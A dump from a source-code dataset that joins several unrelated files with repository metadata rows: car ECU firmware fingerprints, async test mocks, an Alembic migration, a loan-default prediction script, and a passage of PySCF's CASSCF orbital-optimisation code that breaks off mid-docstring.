(Ecu.esp, 0x7d1, None): [b'\xf1\x816V5RAK00018.ELF\xf1\x00\x00\x00\x00\x00\x00\x00\xf1\xa01.05', ],
(Ecu.engine, 0x7e0, None): [b'"\x01TOS-0NU06F301J02', ],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00OS MDPS C 1.00 1.05 56310J9030\x00 4OSDC105', ],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00OS9 LKAS AT USA LHD 1.00 1.00 95740-J9300 g21', ],
(Ecu.transmission, 0x7e1, None): [b'\xf1\x816U2VE051\x00\x00\xf1\x006U2V0_C2\x00\x006U2VE051\x00\x00DOS4T16NS3\x00\x00\x00\x00', ],
},
CAR.KONA_EV: {
(Ecu.esp, 0x7D1, None): [b'\xf1\x00OS IEB \r 105\x18\t\x18 58520-K4000\xf1\xa01.05', ],
(Ecu.fwdCamera, 0x7C4, None): [b'\xf1\x00OSE LKAS AT EUR LHD 1.00 1.00 95740-K4100 W40', ],
(Ecu.eps, 0x7D4, None): [b'\xf1\x00OS MDPS C 1.00 1.04 56310K4050\x00 4OEDC104', ],
(Ecu.fwdRadar, 0x7D0, None): [b'\xf1\x00OSev SCC F-CUP 1.00 1.01 99110-K4000 \xf1\xa01.01', ],
},
CAR.KIA_NIRO_EV: {
(Ecu.fwdRadar, 0x7D0, None): [
b'\xf1\x00DEev SCC F-CUP 1.00 1.03 96400-Q4100 \xf1\xa01.03',
b'\xf1\x00DEev SCC F-CUP 1.00 1.00 99110-Q4000 \xf1\xa01.00',
],
(Ecu.esp, 0x7D1, None): [
b'\xf1\xa01.06',
b'\xf1\xa01.07',
],
(Ecu.eps, 0x7D4, None): [
b'\xf1\x00DE MDPS C 1.00 1.05 56310Q4000\x00 4DEEC105',
b'\xf1\x00DE MDPS C 1.00 1.05 56310Q4100\x00 4DEEC105',
],
(Ecu.fwdCamera, 0x7C4, None): [
b'\xf1\x00DEE MFC AT USA LHD 1.00 1.03 95740-Q4000 180821',
b'\xf1\x00DEE MFC AT EUR LHD 1.00 1.00 99211-Q4000 191211',
],
},
CAR.KIA_OPTIMA: {
(Ecu.fwdRadar, 0x7d0, None): [b'\xf1\x00JF__ SCC F-CUP 1.00 1.00 96400-D4110 '],
(Ecu.esp, 0x7d1, None): [b'\xf1\x00JF ESC \v 11 \x18\x030 58920-D5180',],
(Ecu.engine, 0x7e0, None): [b'\x01TJFAJNU06F201H03'],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00TM MDPS C 1.00 1.00 56340-S2000 8409'],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00JFA LKAS AT USA LHD 1.00 1.02 95895-D5000 h31'],
(Ecu.transmission, 0x7e1, None): [b'\xf1\x816U2V8051\x00\x00\xf1\x006U2V0_C2\x00\x006U2V8051\x00\x00DJF0T16NL0\t\xd2GW'],
}
}
CHECKSUM = {
"crc8": [CAR.SANTA_FE, CAR.SONATA, CAR.PALISADE],
"6B": [CAR.KIA_SORENTO, CAR.HYUNDAI_GENESIS],
}
FEATURES = {
# which message has the gear
"use_cluster_gears": set([CAR.ELANTRA, CAR.ELANTRA_GT_I30, CAR.KONA]),
"use_tcu_gears": set([CAR.KIA_OPTIMA, CAR.SONATA_LF, CAR.VELOSTER]),
"use_elect_gears": set([CAR.KIA_NIRO_EV, CAR.KIA_OPTIMA_H, CAR.IONIQ_EV_LTD, CAR.KONA_EV, CAR.IONIQ, CAR.IONIQ_EV_2020]),
# these cars use the FCA11 message for the AEB and FCW signals, all others use SCC12
"use_fca": set([CAR.SONATA, CAR.ELANTRA, CAR.ELANTRA_GT_I30, CAR.KIA_STINGER, CAR.IONIQ, CAR.IONIQ_EV_2020, CAR.KONA_EV, CAR.KIA_FORTE, CAR.KIA_NIRO_EV, CAR.PALISADE, CAR.GENESIS_G70, CAR.KONA]),
"use_bsm": set([CAR.SONATA, CAR.PALISADE, CAR.HYUNDAI_GENESIS, CAR.GENESIS_G70, CAR.GENESIS_G80, CAR.GENESIS_G90, CAR.KONA, CAR.IONIQ_EV_2020]),
}
EV_HYBRID = set([CAR.IONIQ_EV_2020, CAR.IONIQ_EV_LTD, CAR.IONIQ, CAR.KONA_EV, CAR.KIA_NIRO_EV])
DBC = {
CAR.ELANTRA: dbc_dict('hyundai_kia_generic', None),
CAR.ELANTRA_GT_I30: dbc_dict('hyundai_kia_generic', None),
CAR.GENESIS_G70: dbc_dict('hyundai_kia_generic', None),
CAR.GENESIS_G80: dbc_dict('hyundai_kia_generic', None),
CAR.GENESIS_G90: dbc_dict('hyundai_kia_generic', None),
CAR.HYUNDAI_GENESIS: dbc_dict('hyundai_kia_generic', None),
CAR.IONIQ_EV_2020: dbc_dict('hyundai_kia_generic', None),
CAR.IONIQ_EV_LTD: dbc_dict('hyundai_kia_generic', None),
CAR.IONIQ: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_FORTE: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_NIRO_EV: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_OPTIMA: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_OPTIMA_H: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_SORENTO: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_STINGER: dbc_dict('hyundai_kia_generic', None),
CAR.KONA: dbc_dict('hyundai_kia_generic', None),
CAR.KONA_EV: dbc_dict('hyundai_kia_generic', None),
CAR.SANTA_FE: dbc_dict('hyundai_kia_generic', None),
CAR.SONATA: dbc_dict('hyundai_kia_generic', None),
CAR.SONATA_LF: dbc_dict('hyundai_kia_generic', None),
CAR.PALISADE: dbc_dict('hyundai_kia_generic', None),
CAR.VELOSTER: dbc_dict('hyundai_kia_generic', None),
}
STEER_THRESHOLD = 150
| 86.098086 | 928 | 0.588346 |
8962c9b54edfae60a7f4e59aecda1c9e188cd64a | 2,080 | py | Python | test/helpers.py | edwinschrubb/cryptoapi | 0b4351560c4d55a3f38847f94f82c0a34afe87bc | [
"MIT"
] | 9 | 2020-08-07T04:12:45.000Z | 2022-03-15T03:28:43.000Z | test/helpers.py | edwinschrubb/cryptoapi | 0b4351560c4d55a3f38847f94f82c0a34afe87bc | [
"MIT"
] | null | null | null | test/helpers.py | edwinschrubb/cryptoapi | 0b4351560c4d55a3f38847f94f82c0a34afe87bc | [
"MIT"
] | 4 | 2020-08-07T08:48:22.000Z | 2021-12-23T05:18:24.000Z | from unittest.mock import MagicMock
BOOK_METADATA = {
'timestamp': None,
'datetime': None,
'nonce': None
}
TEST_MARKET = {
'percentage': True,
'tierBased': True,
'maker': 0.001,
'taker': 0.002,
'tiers': {
'taker': [
[0, 0.002],
[500000, 0.002],
[1000000, 0.002],
[2500000, 0.002],
[5000000, 0.002],
[7500000, 0.002],
[10000000, 0.0018],
[15000000, 0.0016],
[20000000, 0.0014000000000000002],
[25000000, 0.0012],
[30000000, 0.001]
],
'maker': [
[0, 0.001],
[500000, 0.0008],
[1000000, 0.0006],
[2500000, 0.0004],
[5000000, 0.0002],
[7500000, 0],
[10000000, 0],
[15000000, 0],
[20000000, 0],
[25000000, 0],
[30000000, 0]
]
},
'precision': {
'price': 5,
'amount': 8
},
'limits': {
'amount': {
'min': 0.0006,
'max': 2000.0
},
'price': {
'min': 1e-05,
'max': 100000.0
},
'cost': {
'min': 6e-09,
'max': None
}
},
'id': 'BTCUSD',
'symbol': 'BTC/USD',
'base': 'BTC',
'quote': 'USD',
'baseId': 'BTC',
'quoteId': 'USD',
'active': True,
'info': {
'pair': 'btcusd',
'price_precision': 5,
'initial_margin': '20.0',
'minimum_margin': '10.0',
'maximum_order_size': '2000.0',
'minimum_order_size': '0.0006',
'expiration': 'NA',
'margin': True
}
}
class AsyncMock(MagicMock):
    """A MagicMock whose call is awaitable, for mocking coroutine functions."""

    async def __call__(self, *args, **kwargs):
        # Delegate to MagicMock's normal call bookkeeping (return_value,
        # side_effect, call recording), but from inside a coroutine so the
        # caller can ``await`` the mock.
        result = super().__call__(*args, **kwargs)
        return result
class AsyncContextManager(MagicMock):
    """A MagicMock usable in ``async with`` blocks.

    Reuses MagicMock's synchronous context-manager bookkeeping so entry and
    exit are recorded like ordinary ``__enter__``/``__exit__`` calls.
    """

    async def __aenter__(self, *args, **kwargs):
        entered = super().__enter__(*args, **kwargs)
        return entered

    async def __aexit__(self, *args, **kwargs):
        exited = super().__exit__(*args, **kwargs)
        return exited
| 22.857143 | 49 | 0.439904 |
810d005ae1576ecf6d7c0f234b9b74efbcffb9d3 | 657 | py | Python | restapi/migrations/versions/99100c610a3e_.py | ninjadotorg/KPI | 430617a1e85304a254cc7364d524d721b8d45b11 | [
"MIT"
] | 2 | 2020-06-30T18:03:12.000Z | 2021-09-02T11:31:59.000Z | restapi/migrations/versions/99100c610a3e_.py | ninjadotorg/KPI | 430617a1e85304a254cc7364d524d721b8d45b11 | [
"MIT"
] | 10 | 2020-09-05T23:29:52.000Z | 2022-03-11T23:36:59.000Z | restapi/migrations/versions/99100c610a3e_.py | ninjadotorg/KPI | 430617a1e85304a254cc7364d524d721b8d45b11 | [
"MIT"
] | null | null | null | """empty message
Revision ID: 99100c610a3e
Revises: d36e6e98140c
Create Date: 2018-12-13 15:50:36.975372
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '99100c610a3e'
down_revision = 'd36e6e98140c'
branch_labels = None
depends_on = None
def upgrade():
    """Apply this revision: add the nullable ``avatar`` string column to ``user``."""
    # ### commands auto generated by Alembic - please adjust! ###
    avatar_column = sa.Column('avatar', sa.String(length=255), nullable=True)
    op.add_column('user', avatar_column)
    # ### end Alembic commands ###
def downgrade():
    """Revert this revision: drop the ``avatar`` column from ``user``."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('user', 'avatar')
    # ### end Alembic commands ###
| 22.655172 | 84 | 0.69102 |
be83aff961eff0b4af669019489eb317a246cd7d | 1,920 | py | Python | examples/beta/lending-club/loans-enriched/enrich_loans.py | admariner/beneath | a6aa2c220e4a646be792379528ae673f4bef440b | [
"MIT"
] | 65 | 2021-04-27T13:13:09.000Z | 2022-01-24T00:26:06.000Z | examples/beta/lending-club/loans-enriched/enrich_loans.py | admariner/beneath | a6aa2c220e4a646be792379528ae673f4bef440b | [
"MIT"
] | 22 | 2021-10-06T10:30:40.000Z | 2021-12-10T11:36:55.000Z | examples/beta/lending-club/loans-enriched/enrich_loans.py | admariner/beneath | a6aa2c220e4a646be792379528ae673f4bef440b | [
"MIT"
] | 4 | 2021-04-24T15:29:51.000Z | 2022-03-30T16:20:12.000Z | import beneath
import joblib
# config
INPUT_TABLE = "loans"
OUTPUT_TABLE = "loans-enriched"
OUTPUT_SCHEMA = open("loans_enriched.graphql", "r").read()
# load ML model to use for predictions
clf = joblib.load('model.pkl')
async def process_loan(loan):
    """Predict loan default with the pre-trained classifier and yield an
    enriched record.

    Runs ``clf`` (loaded at module import) on a fixed set of numeric
    features from ``loan`` and yields a copy of the input fields plus a
    ``loan_status_predicted`` string.

    Args:
        loan: mapping containing the loan fields listed in
            ``passthrough_keys`` below.

    Yields:
        dict: the enriched loan record.
    """
    # Feature order must match the order the classifier was trained with.
    feature_keys = (
        'term', 'int_rate', 'loan_amount', 'annual_inc', 'acc_now_delinq',
        'dti', 'fico_range_high', 'open_acc', 'pub_rec', 'revol_util',
    )
    X = [[loan[k] for k in feature_keys]]
    # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit are
    # no longer swallowed; malformed rows still fall back to "no default".
    try:
        y_pred = clf.predict(X)[0]
    except Exception:
        y_pred = False
    # Copy the input fields through unchanged and attach the prediction.
    passthrough_keys = (
        'id', 'list_d', 'issue_d', 'grade', 'sub_grade', 'term', 'int_rate',
        'loan_amount', 'purpose', 'home_ownership', 'annual_inc',
        'addr_state', 'acc_now_delinq', 'dti', 'fico_range_high', 'open_acc',
        'pub_rec', 'revol_util', 'loan_status',
    )
    enriched_loan = {k: loan[k] for k in passthrough_keys}
    enriched_loan['loan_status_predicted'] = str(y_pred)
    yield enriched_loan
if __name__ == "__main__":
# EASY OPTION
beneath.easy_derive_table(
input_table_path=INPUT_TABLE,
apply_fn=process_loan,
output_table_path=OUTPUT_TABLE,
output_table_schema=OUTPUT_SCHEMA,
)
# DETAILED OPTION
# p = beneath.Pipeline(parse_args=True)
# loans = p.read_table(INPUT_TABLE)
# loans_enriched = p.apply(loans, process_loan)
# p.write_table(loans_enriched, OUTPUT_TABLE, OUTPUT_SCHEMA)
# p.main()
| 30.47619 | 91 | 0.645313 |
6db3ef375d885aa098c133ca2e6256e148091d7f | 1,738 | py | Python | src/command/args/namespace.py | vincent-lg/talismud | 645bdae3d2e71cde51a25fe48c8f1bde15319631 | [
"BSD-3-Clause"
] | 4 | 2020-05-16T21:58:55.000Z | 2020-08-29T11:17:31.000Z | src/command/args/namespace.py | vincent-lg/talismud | 645bdae3d2e71cde51a25fe48c8f1bde15319631 | [
"BSD-3-Clause"
] | 1 | 2020-12-15T11:22:32.000Z | 2020-12-15T11:22:32.000Z | src/command/args/namespace.py | vincent-lg/talismud | 645bdae3d2e71cde51a25fe48c8f1bde15319631 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2020-20201, LE GOFF Vincent
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
"""Namespace for proper argument parsing."""
class Namespace:
    """Lightweight attribute container representing a user namespace."""

    def __repr__(self):
        # Show every dynamically-assigned attribute, in the same
        # "Namespace{...}" form the original f-string produced.
        return "Namespace" + repr(self.__dict__)
| 45.736842 | 78 | 0.772727 |
13202f7089f8f004511b2eb5b67f3c9aba057bad | 103,590 | py | Python | pyscf/mcscf/mc1step.py | smgarner229/pyscf | b4f00378012e14ca5f7058f753cc0d586aa436b7 | [
"Apache-2.0"
] | null | null | null | pyscf/mcscf/mc1step.py | smgarner229/pyscf | b4f00378012e14ca5f7058f753cc0d586aa436b7 | [
"Apache-2.0"
] | null | null | null | pyscf/mcscf/mc1step.py | smgarner229/pyscf | b4f00378012e14ca5f7058f753cc0d586aa436b7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
import sys
import time
import copy
import os
from functools import reduce
import numpy
import scipy.linalg
from pyscf import lib, tools
from pyscf.lib import logger
from pyscf.mcscf import casci, addons
from pyscf.mcscf.casci import get_fock, cas_natorb, canonicalize
from pyscf.mcscf import mc_ao2mo
from pyscf.mcscf import chkfile
from pyscf import ao2mo, scf
from pyscf import gto
from pyscf import fci
from pyscf.soscf import ciah
from pyscf.data import nist
from pyscf import __config__
import scipy
import scipy.optimize
WITH_MICRO_SCHEDULER = getattr(__config__, 'mcscf_mc1step_CASSCF_with_micro_scheduler', False)
WITH_STEPSIZE_SCHEDULER = getattr(__config__, 'mcscf_mc1step_CASSCF_with_stepsize_scheduler', True)
# ref. JCP, 82, 5053; JCP, 73, 2342
# gradients, hessian operator and hessian diagonal
def gen_g_hop(casscf, mo, u, casdm1, casdm2, eris, get_g=False):
    """Build the orbital gradient and Hessian machinery for one CASSCF step.

    Args:
        casscf: CASSCF object (supplies ncas/ncore/pack_uniq_var/...).
        mo: MO coefficient matrix.
        u: orbital rotation matrix at the expansion point.
        casdm1, casdm2: active-space 1- and 2-particle density matrices.
        eris: MO integral container (ppaa, papa, vhf_c, j_pc, k_pc blocks).
        get_g: if True, return only ``(g, gorb_update)`` and skip building
            the Hessian operator and its diagonal.

    Returns:
        g_orb: packed (antisymmetric, unique-variable) orbital gradient.
        gorb_update: function(u, fcivec) that recomputes the packed gradient
            after rotating the orbitals by u with a fresh CI vector.
        h_op: function applying the orbital Hessian to a packed vector.
        h_diag: packed diagonal of the orbital Hessian.
    """
    ncas = casscf.ncas
    nelecas = casscf.nelecas
    ncore = casscf.ncore
    nocc = ncas + ncore
    nmo = mo.shape[1]
    # Full MO-basis 1-RDM: doubly-occupied core block plus active casdm1.
    dm1 = numpy.zeros((nmo,nmo))
    idx = numpy.arange(ncore)
    dm1[idx,idx] = 2
    dm1[ncore:nocc,ncore:nocc] = casdm1
    # part5
    jkcaa = numpy.empty((nocc,ncas))
    # part2, part3
    vhf_a = numpy.empty((nmo,nmo))
    # part1 ~ (J + 2K)
    dm2tmp = casdm2.transpose(1,2,0,3) + casdm2.transpose(0,2,1,3)
    dm2tmp = dm2tmp.reshape(ncas**2,-1)
    hdm2 = numpy.empty((nmo,ncas,nmo,ncas))
    g_dm2 = numpy.empty((nmo,ncas))
    # Single pass over the ppaa/papa integral buffers builds the active-space
    # Fock-like potential, the 2-RDM contraction, and Hessian intermediates.
    for i in range(nmo):
        jbuf = eris.ppaa[i]
        kbuf = eris.papa[i]
        if i < nocc:
            jkcaa[i] = numpy.einsum('ik,ik->i', 6*kbuf[:,i]-2*jbuf[i], casdm1)
        vhf_a[i] =(numpy.einsum('quv,uv->q', jbuf, casdm1)
                 - numpy.einsum('uqv,uv->q', kbuf, casdm1) * .5)
        jtmp = lib.dot(jbuf.reshape(nmo,-1), casdm2.reshape(ncas*ncas,-1))
        jtmp = jtmp.reshape(nmo,ncas,ncas)
        ktmp = lib.dot(kbuf.transpose(1,0,2).reshape(nmo,-1), dm2tmp)
        hdm2[i] = (ktmp.reshape(nmo,ncas,ncas)+jtmp).transpose(1,0,2)
        g_dm2[i] = numpy.einsum('uuv->v', jtmp[ncore:nocc])
    # Release the large integral intermediates before the Hessian stage.
    jbuf = kbuf = jtmp = ktmp = dm2tmp = None
    vhf_ca = eris.vhf_c + vhf_a
    h1e_mo = reduce(numpy.dot, (mo.T, casscf.get_hcore(), mo))
    ################# gradient #################
    g = numpy.zeros_like(h1e_mo)
    g[:,:ncore] = (h1e_mo[:,:ncore] + vhf_ca[:,:ncore]) * 2
    g[:,ncore:nocc] = numpy.dot(h1e_mo[:,ncore:nocc]+eris.vhf_c[:,ncore:nocc],casdm1)
    g[:,ncore:nocc] += g_dm2
    def gorb_update(u, fcivec):
        # Recompute the packed orbital gradient at the rotated orbitals
        # mo.u with new RDMs from fcivec (used after CI/orbital updates).
        uc = u[:,:ncore].copy()
        ua = u[:,ncore:nocc].copy()
        rmat = u - numpy.eye(nmo)
        ra = rmat[:,ncore:nocc].copy()
        mo1 = numpy.dot(mo, u)
        mo_c = numpy.dot(mo, uc)
        mo_a = numpy.dot(mo, ua)
        dm_c = numpy.dot(mo_c, mo_c.T) * 2
        casdm1, casdm2 = casscf.fcisolver.make_rdm12(fcivec, ncas, nelecas)
        dm_a = reduce(numpy.dot, (mo_a, casdm1, mo_a.T))
        vj, vk = casscf.get_jk(casscf.mol, (dm_c, dm_a))
        vhf_c = reduce(numpy.dot, (mo1.T, vj[0]-vk[0]*.5, mo1[:,:nocc]))
        vhf_a = reduce(numpy.dot, (mo1.T, vj[1]-vk[1]*.5, mo1[:,:nocc]))
        h1e_mo1 = reduce(numpy.dot, (u.T, h1e_mo, u[:,:nocc]))
        p1aa = numpy.empty((nmo,ncas,ncas*ncas))
        paa1 = numpy.empty((nmo,ncas*ncas,ncas))
        aaaa = numpy.empty([ncas]*4)
        for i in range(nmo):
            jbuf = eris.ppaa[i]
            kbuf = eris.papa[i]
            p1aa[i] = lib.dot(ua.T, jbuf.reshape(nmo,-1))
            paa1[i] = lib.dot(kbuf.transpose(0,2,1).reshape(-1,nmo), ra)
            if ncore <= i < nocc:
                aaaa[i-ncore] = jbuf[ncore:nocc]
        g = numpy.zeros_like(h1e_mo)
        g[:,:ncore] = (h1e_mo1[:,:ncore] + vhf_c[:,:ncore] + vhf_a[:,:ncore]) * 2
        g[:,ncore:nocc] = numpy.dot(h1e_mo1[:,ncore:nocc]+vhf_c[:,ncore:nocc], casdm1)
        # 0000 + 1000 + 0100 + 0010 + 0001 + 1100 + 1010 + 1001 (missing 0110 + 0101 + 0011)
        p1aa = lib.dot(u.T, p1aa.reshape(nmo,-1)).reshape(nmo,ncas,ncas,ncas)
        paa1 = lib.dot(u.T, paa1.reshape(nmo,-1)).reshape(nmo,ncas,ncas,ncas)
        p1aa += paa1
        p1aa += paa1.transpose(0,1,3,2)
        g[:,ncore:nocc] += numpy.einsum('puwx,wxuv->pv', p1aa, casdm2)
        return casscf.pack_uniq_var(g-g.T)
    #Lan needs to get g only
    if get_g:
        return g, gorb_update
    ############## hessian, diagonal ###########
    # part7
    h_diag = numpy.einsum('ii,jj->ij', h1e_mo, dm1) - h1e_mo * dm1
    h_diag = h_diag + h_diag.T
    # part8
    g_diag = g.diagonal()
    h_diag -= g_diag + g_diag.reshape(-1,1)
    idx = numpy.arange(nmo)
    h_diag[idx,idx] += g_diag * 2
    # part2, part3
    v_diag = vhf_ca.diagonal() # (pr|kl) * E(sq,lk)
    h_diag[:,:ncore] += v_diag.reshape(-1,1) * 2
    h_diag[:ncore] += v_diag * 2
    idx = numpy.arange(ncore)
    h_diag[idx,idx] -= v_diag[:ncore] * 4
    # V_{pr} E_{sq}
    tmp = numpy.einsum('ii,jj->ij', eris.vhf_c, casdm1)
    h_diag[:,ncore:nocc] += tmp
    h_diag[ncore:nocc,:] += tmp.T
    tmp = -eris.vhf_c[ncore:nocc,ncore:nocc] * casdm1
    h_diag[ncore:nocc,ncore:nocc] += tmp + tmp.T
    # part4
    # -2(pr|sq) + 4(pq|sr) + 4(pq|rs) - 2(ps|rq)
    tmp = 6 * eris.k_pc - 2 * eris.j_pc
    h_diag[ncore:,:ncore] += tmp[ncore:]
    h_diag[:ncore,ncore:] += tmp[ncore:].T
    # part5 and part6 diag
    # -(qr|kp) E_s^k p in core, sk in active
    h_diag[:nocc,ncore:nocc] -= jkcaa
    h_diag[ncore:nocc,:nocc] -= jkcaa.T
    v_diag = numpy.einsum('ijij->ij', hdm2)
    h_diag[ncore:nocc,:] += v_diag.T
    h_diag[:,ncore:nocc] += v_diag
    # Does this term contribute to internal rotation?
    # h_diag[ncore:nocc,ncore:nocc] -= v_diag[:,ncore:nocc]*2
    g_orb = casscf.pack_uniq_var(g-g.T)
    h_diag = casscf.pack_uniq_var(h_diag)
    #print "g shape", g.shape[0], g.shape[1], g_orb.shape[0]
    def h_op(x):
        # Apply the orbital Hessian to a packed rotation vector x.
        x1 = casscf.unpack_uniq_var(x)
        # part7
        # (-h_{sp} R_{rs} gamma_{rq} - h_{rq} R_{pq} gamma_{sp})/2 + (pr<->qs)
        x2 = reduce(lib.dot, (h1e_mo, x1, dm1))
        # part8
        # (g_{ps}\delta_{qr}R_rs + g_{qr}\delta_{ps}) * R_pq)/2 + (pr<->qs)
        x2 -= numpy.dot((g+g.T), x1) * .5
        # part2
        # (-2Vhf_{sp}\delta_{qr}R_pq - 2Vhf_{qr}\delta_{sp}R_rs)/2 + (pr<->qs)
        x2[:ncore] += reduce(numpy.dot, (x1[:ncore,ncore:], vhf_ca[ncore:])) * 2
        # part3
        # (-Vhf_{sp}gamma_{qr}R_{pq} - Vhf_{qr}gamma_{sp}R_{rs})/2 + (pr<->qs)
        x2[ncore:nocc] += reduce(numpy.dot, (casdm1, x1[ncore:nocc], eris.vhf_c))
        # part1
        x2[:,ncore:nocc] += numpy.einsum('purv,rv->pu', hdm2, x1[:,ncore:nocc])
        if ncore > 0:
            # part4, part5, part6
            # Due to x1_rs [4(pq|sr) + 4(pq|rs) - 2(pr|sq) - 2(ps|rq)] for r>s p>q,
            # == -x1_sr [4(pq|sr) + 4(pq|rs) - 2(pr|sq) - 2(ps|rq)] for r>s p>q,
            # x2[:,:ncore] += H * x1[:,:ncore] => (becuase x1=-x1.T) =>
            # x2[:,:ncore] += -H' * x1[:ncore] => (becuase x2-x2.T) =>
            # x2[:ncore] += H' * x1[:ncore]
            va, vc = casscf.update_jk_in_ah(mo, x1, casdm1, eris)
            x2[ncore:nocc] += va
            x2[:ncore,ncore:] += vc
        # (pr<->qs)
        x2 = x2 - x2.T
        # NOTE(review): is_gmres_trust_region looks like a level shift added
        # for the custom GMRES solver; attribute is defined on the modified
        # CASSCF class elsewhere — confirm before reuse.
        if casscf.is_gmres_trust_region:
            x2 += 0.1 * x1
        return casscf.pack_uniq_var(x2)
    return g_orb, gorb_update, h_op, h_diag
# BGN Lan's SS-CASSCF
#GMRES solver
def genMinRes(casscf, bvec, xguess, linear_transform, inner_product=None, precondition=None, thresh=1.0e-6, maxiter=20):
    """
    Solves the linear system A x = b via the generalized minimal residual method, written by Eric Neuscamman.

    required inputs:

      bvec                the vector b
      xguess              an initial guess for the vector x
      linear_transform    function that performs the linear transformation A x

    optional inputs:

      inner_product       function of two inputs that computes their inner product, defaults to vector dot product
      precondition        function of one input (e.g. x) that returns an approximation to A^(-1) x, defaults to the identity
      thresh              error threshold below which to stop the iterations, defaults to 1.0e-6
      maxiter             maximum number of iterations, defaults to 20

    Returns the solution vector x (same shape as bvec; the loop always
    returns, either on convergence or when maxiter is reached).
    """
    import numpy as np
    log = logger.new_logger(casscf, verbose=None)
    # default is to use no preconditioning
    if precondition is None:
        precondition = lambda x: x
    # default inner product is the simple vector dot product
    if inner_product is None:
        inner_product = lambda x, y: np.sum( x * y )
    # create a function to reshape vectors into the same shape as the input
    rsInput = lambda x: np.reshape(x, bvec.shape)
    # create a function to reshape vectors into the shape used internally
    rsInternal = lambda x: np.reshape(x, [bvec.size, 1] )
    # create a function to take inner products
    ip = lambda x, y: inner_product( rsInput(x), rsInput(y) )
    # create a function to evaluate a vector's norm
    norm = lambda x: np.sqrt( ip(x,x) )
    # create a function to apply the linear transformation and reshape
    lt = lambda x: rsInternal( linear_transform( rsInput(x) ) )
    # get initial c vector (coefficients of x in the Krylov basis Y)
    c = np.reshape( np.array( [ norm(xguess) ] ), [1,1] )
    # get first Krylov vector
    Y = np.reshape( xguess / c[0,0], [bvec.size, 1] )
    # get linear transformation of first Krylov vector
    AY = lt(Y[:,0:1])
    # iterate
    for iteration in range(maxiter+1):
        # get linear transform on current x vector
        Ax = np.dot(AY,c)
        # get residual
        r = rsInternal(bvec) - Ax
        # get residual norm and check for convergence
        res_norm = norm(r)
        #log.debug("iteration %4i res_norm = %12.6e", iteration, res_norm )
        sys.stdout.flush()
        if res_norm < thresh:
            log.info( "genMinRes converged after %i iterations", iteration)
            return rsInput(np.dot(Y,c))
        # stop if the maximum number of iterations has been reached
        if iteration == maxiter:
            log.info("genMinRes reached the maximum number of iterations.")
            log.info("Returning the current best estimate to the solution.")
            return rsInput(np.dot(Y,c))
        # get next krylov vector (preconditioned residual)
        q = rsInternal( precondition( rsInput(r) ) )
        # orthonormalize new krylov vector against existing krylov vectors
        # (one Gram-Schmidt pass)
        for i in range(Y.shape[1]):
            q = q - ip(Y[:,i:i+1], q) * Y[:,i:i+1]
        q = q / norm(q)
        # save the new Krylov vector
        Y = np.concatenate( [ Y, q ], 1 )
        # save the linear transformation of the new Krylov vector
        AY = np.concatenate( [ AY, lt(q) ], 1 )
        # get the SVD of the matrix of linearly transformed Krylov vectors
        U, sigma, VT = np.linalg.svd(AY, full_matrices=False)
        # get the pseudo-inverse of the singular values
        # (singular values below 1e-8 of the largest are dropped)
        inv_sigma = np.zeros([sigma.size, 1])
        for i in range(sigma.size):
            if np.abs( sigma[i] / sigma[0] ) > 1.0e-8:
                inv_sigma[i,0] = 1.0 / sigma[i]
        # get the new c vector via the pseudo-inverse: c = (AY)^+ b
        c = np.dot( np.transpose(VT), inv_sigma * np.dot( np.transpose(U), rsInternal(bvec) ) )
#line search to minimize gradE w.r.t orb. rotation
def lineSearch_naive(casscf, dr, fcivec, u, gorb_update):
    """Grid line search minimizing the orbital-gradient norm along step dr.

    Scans step lengths alpha in [0, 3) with a 0.1 spacing, picks the alpha
    with the smallest |g|, and returns the rotation matrix and gradient at
    that step.

    Args:
        casscf: CASSCF object (supplies update_rotate_matrix).
        dr: packed orbital-rotation step direction.
        fcivec: callable returning the current CI vector.
        u: current rotation matrix the step is applied on top of.
